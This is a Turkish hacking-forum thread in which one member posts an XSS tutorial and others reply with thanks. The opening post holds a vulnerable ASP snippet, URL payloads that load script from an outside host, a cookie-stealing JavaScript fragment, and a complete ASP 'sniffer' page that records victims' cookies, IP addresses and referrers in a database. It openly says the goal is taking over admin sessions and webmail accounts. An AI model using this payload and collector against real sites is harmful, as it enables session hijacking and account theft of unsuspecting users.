| Anasayfa | Haftalık İstatistikler | Kimler Online | Bugünkü Mesajlar | GOLD üYE OL | Arkadaş listemi göster | Profilim | Html Renk Kodları |
|
|||||||
| +Web ve Güvenlik Acıkları Web ve Güvenlik Acıkları'İle İlgili Bölümümüz.. |
|
| Anahtar Kelimeler: acigi, kullanimi, xss |
![]() |
|
|
Seçenekler | Stil |
|
|
#1 | |||||||||
|
∂υѕℓєяƒσяυм υує
![]() Üyelik tarihi: Aug 2007
Mesajlar: 60
Konu Sayısı: 6
Seviye: 6 [ ![]() ![]() ![]() ]Aktiflik: 0 / 140 REP Puanı : 17
REP Seviyesi :
![]() |
Netscape Communications Corporation
tarayıcılarında JS scriptlerini çalıştırabildiğni duyurduğunda client ile server arasındaki bağlantı dolayısıyla i=new koduyla kullanıcının Çerez bilgilerinin çalınması sözkonusu oldu.XSS nin Rfi ile çok küçük bir benzerliği var. Rfi Php scriptlerinde olur ve orda text dosyasındaki kodlar server da php olarak algılanır ve php olarak çalışır. Xss açığı ise açığın olduğu scriptte ister resim ister *.js ister iframe ne olursa olsun include edilebiliyor. Size örnek bir Xss açığından bahsedeyim. Active Server Page dilinde yazılmiş bir scripti ele alıyorum. <% X = Request.QueryString("id") response.write X %> Görmüş olduðunuz örnek kodda QueryString Sayfaya yazdırılıyor. Eğer URL kısmında ; [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] yazıyorsa sayfanın herhangi biryerinde XSS yazar. Bunun yerine; 1)Yazıyı renklendirebiliriz = http://site.com/ornek.asp?id=<font color=red>XSS</font> 2)Resim görüntüleyebilirz = http://site.com/ornek.asp?id=<img src= "http://site2.com/x.jpg">3)Ve güvenlik açığının oluştuğu Microsoft’un başına dert olan ve milyonlarca Hotmail Hesabının hacklenmesine sebep olan JS kodu yani uzaktan script çalıştırılması.;http://site.com/ornek.asp?id=<script src= "http://site3"> Şimdi biz x.js yi include ettik ama bu x.js nin içeriği ne olursa sisteme zarar verir ne olmazsa zarar vermez şimdi buna bakalım.. Eðer x.js nin içeriği document.write(’XSS var’) ise sayfada sadece xss var yazar. Ama; i=new/**/Image();i.Yasak Kelime#8217;[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] ise şu anda o url de gezinen kimsenin cookiesi x.asp nin X stringine kaydedilir. şimdi x.asp nin içeriğine bakalım... <% Query = Request.QueryString("X")’ Degiskenler tanimlaniyor If Query = "" Then ’Eger X=bos ise X degiskeni cookie yi alsın yani X=ASPSESSION seklinde karışık değerler.. %> <script language="JavaScript" type="text/JavaScript"> var mxURL = "?X=" + document.cookie; window.location = mxURL; </script> <% end if %> <% veri=request.querystring veri2=right(veri len(veri -2) adres = Request.ServerVariables("HTTP_REFERER") Set conn = Server.CreateObject("adodb.connection") ’Burada veritabanı bağlantısı conn.open "Provider=Microsoft.Jet.Oledb.4.0;Data Source="& Server.MapPath("sniffer.mdb") set rs = Server.CreateObject("adodb.recordset") SQL="Select * from sniffer" rs.open SQL conn 1 3rs.addnew rs("ip") = Request.ServerVariables("REMOTE_ADDR") ’IP veritabanına kaydediliyor rs("adres") = adres ’Çerezin nerden geldiği kaydediliyor rs("cookie") = veri2 ’Çerez kaydediliyor rs("tarih") = now ’Burda tarih kaydediliyor çerezlerin karışmaması için rs.update rs.close set rs = nothing conn.close set conn = nothing %> Burada cookie veritabanına kaydedildi.Şimdi isterseniz bu çerezlere server üzerinden bir fso ile takip edersiniz ister bunları döngüleyecek bir script yazarsınız.Orası size kalmış.. Küçük bir açıklama daha yapacağım; *Cookielerin çalınmasının amacı sitenin adminlerine yöneliktir çünkü onun giriş yaptığı oturum en yetkili olandır.Normal bir userle siteye zarar veremezsiniz. *Çerez hırsızlıgının bir başka kullanım alanı ise Mail Sistemlerindeki Cross Site Scripting açıklarının kullanımıdır.Burda hangi oturumun çerezini çalarsanız o kullanıcının mail adresine giriş yapabilirsiniz. Selametle.. İnşAllah faydalı olabilmişimdir Selametle.. ![]() Adresimiz : w w w. d u s l e r f o r u m. o r g
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
|
|||||||||
|
|
|
|
|
#2 | |||||||||
|
ƒσяυм ρяєηѕєѕ
![]() Üyelik tarihi: Apr 2007
Mesajlar: 552
Konu Sayısı: 51
Seviye: 21 [ ![]() ![]() ![]() ]Aktiflik: 0 / 515 REP Puanı : 73
REP Seviyesi :
![]() |
sağol canım eline sağlık
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] |
|||||||||
|
|
|
|
|
#3 | |||||||||
|
BANLI UYE!
![]() Üyelik tarihi: Aug 2007
Mesajlar: 307
Konu Sayısı: 15
Seviye: 16 [ ]Aktiflik: 0 / 384 REP Puanı : 24
REP Seviyesi :
![]() |
tşk kardesım cok işime yaradı yaw
basarılarının dewamını beklerıs ![]() |
|||||||||
|
|
|
|
|
#4 | |||||||||
|
∂υѕℓєяƒσяυм υує
![]() Üyelik tarihi: Aug 2007
Mesajlar: 60
Konu Sayısı: 6
Seviye: 6 [ ![]() ![]() ![]() ]Aktiflik: 0 / 140 REP Puanı : 17
REP Seviyesi :
![]() |
Rica ederim işinize yaradıysa ne mutlu selametle kolay gelsin
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
|
|||||||||
|
|
|
|
|
#5 | |||||||||
|
BANLI UYE!
![]() Üyelik tarihi: Aug 2007
Mesajlar: 307
Konu Sayısı: 15
Seviye: 16 [ ]Aktiflik: 0 / 384 REP Puanı : 24
REP Seviyesi :
![]() |
sagolasın kardesım emege saygı ve + repppp
|
|||||||||
|
|
|
|
|
#6 | |||||||||
|
∂υѕℓєяƒσяυм υує
![]() Üyelik tarihi: Aug 2007
Mesajlar: 60
Konu Sayısı: 6
Seviye: 6 [ ![]() ![]() ![]() ]Aktiflik: 0 / 140 REP Puanı : 17
REP Seviyesi :
![]() |
Tşk ler eksik olma
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
|
|||||||||
|
|
|
|
|
#7 | |||||||||
|
dυѕLєяƒσяυм üує
![]() DF İstanbul Şubesi
Üyelik tarihi: Jul 2007
Kan Grubu: A RH (+)
Cinsiyet:
Mesajlar: 3.727
Konu Sayısı: 660
Ruh Hali:
Seviye: 46 [ ![]() ![]() ![]() ![]() ]Aktiflik: 341 / 1138 REP Puanı : 166
REP Seviyesi :
![]() ![]() |
emegıne saglık kardesımm + rep
|
|||||||||
|
|
|
|
|
#8 | |||||||||
|
∂υѕℓєяƒσяυм υує
![]() Üyelik tarihi: Aug 2007
Mesajlar: 60
Konu Sayısı: 6
Seviye: 6 [ ![]() ![]() ![]() ]Aktiflik: 0 / 140 REP Puanı : 17
REP Seviyesi :
![]() |
Tşk ler çok güselya emek karşılıksız kalmıyo selametle
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
|
|||||||||
|
|
|
|
|
#9 | |||||||||
|
dυѕLєяƒσяυм üує
![]() DF Uşak Şubesi
Üyelik tarihi: Dec 2007
Cinsiyet:
Mesajlar: 1.415
Konu Sayısı: 199
Ruh Hali:
Seviye: 32 [ ]Aktiflik: 78 / 781 REP Puanı : 47
REP Seviyesi :
![]() |
Paylasım İçin Teşşekkürler
____________________
<========== FoRéVéR HayKo 29 Şubat 2008 - Hayko Cepkin @ Ankara Koneri 28 Şubat 2008 - Hayko Cepkin @ Eskişehir 22 Şubat 2008 - Hayko Cepkin @ İzmit |
|||||||||
|
|
|
![]() |
| Seçenekler | |
| Stil | |



